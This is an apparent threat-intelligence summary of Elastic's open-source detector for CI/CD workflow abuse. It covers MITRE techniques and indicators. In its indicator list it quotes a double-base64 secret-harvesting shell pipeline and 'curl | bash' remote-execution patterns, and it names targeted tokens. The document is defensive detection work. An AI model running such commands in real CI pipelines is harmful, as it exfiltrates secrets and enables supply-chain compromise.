Elastic Security Labs open-sourced cicd-abuse-detector, a drop-in CI template that uses 50+ regex signals plus LLM (Claude) analysis to detect suspicious CI/CD workflow changes across GitHub Actions, GitLab CI, and Azure DevOps. The project is validated against real incidents and offensive toolkits (e.g., Nord Stream, ArtiPACKED, HackerBot-Claw, GhostAction, Shai-Hulud) and produces structured JSON verdicts with optional Elasticsearch logging for cross-platform correlation. #GhostAction #HackerBotClaw
Keypoints
- Attackers increasingly target CI/CD automation rather than production servers, using stolen developer credentials to modify workflows and exfiltrate secrets at scale.
- Elastic released cicd-abuse-detector: a dependency-light CI workflow that extracts 50+ regex and metadata signals from diffs and uses Claude for structured threat analysis.
- The detector works across GitHub Actions, GitLab CI, and Azure DevOps, diffing files per-file (10,000 char cap) and categorizing changed paths into three CI-relevant tiers.
- Detection patterns were tested against offensive tooling and real incidents (Nord Stream, Gato-X, ArtiPACKED, HackerBot-Claw, GhostAction, Shai-Hulud) and ship with 19 malicious and 4 benign example diffs plus an automated test suite.
- Key threat vectors include credential harvesting, privileged trigger exploitation (pull_request_target), permission escalation (id-token/write), runner targeting, supply chain manipulation (mutable action refs, curl|bash), and defense evasion via backdated commits.
- The workflow outputs structured JSON verdicts (severity, confidence, reasoning, evidence, recommendations), can alert via GitHub/Slack/issues, fail PRs, and optionally index verdicts into Elasticsearch for correlation.
MITRE Techniques
- [T1552 ] Unsecured Credentials – Attackers steal developer credentials to modify workflows and harvest CI secrets (‘Stolen developer credentials → Modified workflow file → Harvested CI secrets → Lateral movement to cloud and production’)
- [T1195 ] Supply Chain Compromise – Adversaries manipulate actions, dependencies, or release artifacts to introduce malicious code or exfiltration (‘Supply chain manipulation through mutable action references (using @main instead of SHA-pinned versions), remote script execution (curl | bash), lockfile registry swaps, and dependency poisoning’)
- [T1070.006 ] Timestomp – Defense evasion by backdating commits to make malicious files appear old and trusted (‘Defense evasion via commit timestamp manipulation, making malicious files appear old and trusted’)
- [T1059 ] Command and Scripting Interpreter – Use of shell/command constructs to harvest or exfiltrate secrets and achieve RCE (e.g., double base64, curl|bash, LD_PRELOAD techniques) (‘env -0 | awk -v RS=’0’ ‘/^secret_/ {print $0}’ | base64 -w0 | base64 -w0′ and ‘curl | bash’)
Indicators of Compromise
- [File diffs ] Example malicious/benign diff filenames used for detection and testing – nord-stream-pipeline-exfil.diff, github-env-injection.diff, and 21 more example diffs
- [File paths / configs ] Developer and repo files used as initial access or leak vectors – .vscode/tasks.json, .git/config (artifact upload leaks), and other devcontainer/.dev files
- [Commands / payload patterns ] Shell payloads and encodings used to exfiltrate or execute code – “env -0 | awk -v RS=’0′ ‘/^secret_/ {print $0}’ | base64 -w0 | base64 -w0”, “curl | node” (LD_PRELOAD and double-base64 patterns), and other payload strings
- [Credentials / tokens ] Types of credentials targeted or stolen in incidents – GITHUB_TOKEN, GitHub Personal Access Tokens (PATs), id-token (OIDC) and short-lived tokens referenced in attacks
- [Action / workflow references ] CI action and workflow patterns that indicate risk or misconfiguration – azure/login@v1 (id-token: write), actions/setup-node@main (mutable reference), and examples of actions/checkout behaviors that persist tokens
Read more: https://www.elastic.co/security-labs/detecting-cicd-pipeline-abuse-with-llm-augmented-analysis